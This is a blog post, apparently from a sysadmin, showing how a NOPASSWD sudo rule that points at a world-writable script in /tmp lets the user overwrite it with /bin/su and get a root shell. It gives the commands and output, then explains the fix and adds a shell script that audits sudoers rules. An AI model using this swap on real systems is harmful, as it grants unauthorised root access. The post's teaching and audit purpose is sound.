Monday, 24 July 2017

A dirty privilege escalation trick


A while ago a colleague of mine showed me a quick and dirty privilege escalation trick with which a user could grant themselves root access to a machine.

I felt somewhat inclined to share the trick!

Here is the scenario:

I have a user named sahil on a Linux machine who has been granted sudo access to a single script, /tmp/test.bash. The script is just a plain text file. Note that sudo identifies the permitted command by its pathname only; it does not care what the file at that path contains, which is the whole point of what follows.

Here's the /etc/sudoers entry for the user.

[root@still ~]# grep sahil /etc/sudoers
sahil   ALL=(root)      NOPASSWD: /tmp/test.bash
[root@still ~]#

If I log in as the user and check its rights via sudo -l, I get the expected result.

[sahil@still ~]$ sudo -l
Matching Defaults entries for sahil on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User sahil may run the following commands on this host:
    (root) NOPASSWD: /tmp/test.bash


Without any additional access, trying to switch to root fails, as shown below. sudo prompts for a password because the NOPASSWD tag only covers the one listed command, and then refuses /bin/su because no rule matches it:

[sahil@still ~]$ sudo su
[sudo] password for sahil:
Sorry, user sahil is not allowed to execute '/bin/su' as root on still.
[sahil@still ~]$

But I can run the script.

[sahil@still ~]$ sudo /tmp/test.bash
This is a test script
[sahil@still ~]$


The script lives in /tmp, which every user can reach, and it has mode 777, which is never a good thing. The sticky bit on /tmp does not help here: it only stops other users from deleting or renaming the file, and a world-writable file can be overwritten in place by anyone. Here's an example of why that matters.

Now, as the user sahil, I'll copy the su binary over the script in /tmp. cp overwrites the existing file in place, so the path, owner and mode stay exactly as they were; only the content changes.

[sahil@still ~]$ which su
/bin/su
[sahil@still ~]$ cp /bin/su /tmp/test.bash

Now when I run the script:

[sahil@still ~]$ sudo /tmp/test.bash
[root@still sahil]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@still sahil]#

The user sahil was able to switch to the root user. su ran as root via sudo, and root is never asked for a password, so it simply handed over a root shell.

The fix is straightforward: anything referenced from sudoers must be owned by root, not writable by anyone else, and placed in a directory chain that is also root-owned and not world-writable (never /tmp or a home directory). sudo 1.8.7 and later can additionally pin a rule to the file's content with a digest, for example sha256:<hash> /path/to/script; if the file is replaced, the digest no longer matches and sudo refuses to run it.
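Here is an added example of the check an administrator would want to run before granting rules like the one above. It is my code, not part of the original post: a small POSIX shell audit that reads a sudoers-style file, finds every absolute command path, walks that path and its parent directories looking for components a non-root user could replace, and recognises digest-pinned rules. It assumes Linux with GNU coreutils (stat -c, sha256sum); the sample sudoers lines and the mode-777 script it inspects are constructed in a temporary directory by the demo function, and the digest used there is computed on the spot rather than copied from anywhere.

```shell
#!/bin/sh
# Added example, not code from the original post: audit a sudoers-style
# file for command targets that a non-root user could overwrite (the
# condition the trick above relies on), and recognise digest-pinned rules.
# Assumes Linux with GNU coreutils (stat -c, sha256sum). Only the plain
# "user HOST=(runas) TAG: /path, /path2" rule form is parsed; aliases,
# @include directives and command arguments are not interpreted.

# True (exit 0) if the octal mode of $1 has a write bit for group or other.
other_writable() {
    ow_mode=$(stat -c '%a' "$1") || return 2
    ow_go=$(printf '%s' "$ow_mode" | tail -c 2)   # last two digits: group, other
    case $ow_go in
        [2367]?|?[2367]) return 0 ;;
        *) return 1 ;;
    esac
}

# True (exit 0) if an octal mode string such as 1777 has the sticky bit set.
sticky() {
    case $1 in
        [1357]???) return 0 ;;
        *) return 1 ;;
    esac
}

# Walk $1 and each of its parent directories. Print one finding per line;
# exit 0 if some component lets a non-root user replace the target,
# 1 if the whole chain is root-owned and not writable by others.
audit_path() {
    p=$1; bad=1
    while :; do
        if [ -e "$p" ]; then
            owner=$(stat -c '%U' "$p"); mode=$(stat -c '%a' "$p")
            if [ "$owner" != root ]; then
                echo "$p: owned by $owner, not root"; bad=0
            fi
            if other_writable "$p"; then
                if [ -d "$p" ] && sticky "$mode"; then
                    echo "$p: world-writable directory, sticky bit set (entries cannot be renamed away by other users)"
                else
                    echo "$p: mode $mode is group/world writable"; bad=0
                fi
            fi
        else
            echo "$p: does not exist yet; whoever can write the parent directory can create it"
        fi
        [ "$p" = / ] && break
        p=$(dirname "$p")
    done
    return $bad
}

# Parse the sudoers-style file $1 and audit every absolute command path.
# Exit 0 when nothing needs attention, 1 when at least one rule is exploitable.
audit_sudoers() {
    file=$1; rc=0
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%%#*}                               # strip comments
        case $line in
            ''|Defaults*|*_Alias*) continue ;;         # not a user specification
            *=*) ;;
            *) continue ;;
        esac
        user=${line%%[[:space:]]*}
        rhs=${line#*=}
        old_ifs=$IFS; IFS=,; set -- $rhs; IFS=$old_ifs  # one entry per comma-separated spec
        for spec in "$@"; do
            path=''; pinned=0
            for tok in $spec; do
                case $tok in
                    '('*')') ;;                                    # runas list, e.g. (root)
                    sha224:*|sha256:*|sha384:*|sha512:*) pinned=1 ;; # Digest_Spec pins the content
                    *:) ;;                                         # NOPASSWD:, NOEXEC:, ...
                    /*) path=$tok; break ;;                        # the command; anything after is args
                esac
            done
            [ -n "$path" ] || continue
            if [ "$pinned" = 1 ]; then
                echo "$user: $path is pinned by a digest; sudo refuses it once the content changes"
            elif audit_path "$path"; then
                echo "$user: $path can be replaced by a non-root user, giving a root shell as in the post"
                rc=1
            fi
        done
    done < "$file"
    return $rc
}

# Constructed demo: a mode-777 script in a temp directory, one rule that names
# it by path only and one that pins it with its sha256 digest.
demo() {
    d=$(mktemp -d); script=$d/test.bash
    printf '#!/bin/bash\necho "This is a test script"\n' > "$script"
    chmod 777 "$script"
    printf 'sahil   ALL=(root)      NOPASSWD: %s\n' "$script" > "$d/sudoers.bad"
    digest=$(sha256sum "$script" | cut -d' ' -f1)
    printf 'sahil   ALL=(root)      NOPASSWD: sha256:%s %s\n' "$digest" "$script" > "$d/sudoers.pinned"
    echo "== rule by path only"
    audit_sudoers "$d/sudoers.bad" || echo "=> exploitable"
    echo "== rule pinned by digest"
    audit_sudoers "$d/sudoers.pinned" && echo "=> a content swap would be refused"
    rm -rf "$d"
}
demo
```

Run it against the real file with `audit_sudoers /etc/sudoers` as root; the exit status is 1 whenever some rule points at a path that a non-root user could overwrite, which is exactly the situation the post exploits. The walk up the directory chain matters as much as the file's own mode: a root-owned 755 script sitting in a user-writable directory without the sticky bit can be renamed away and replaced just as easily.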
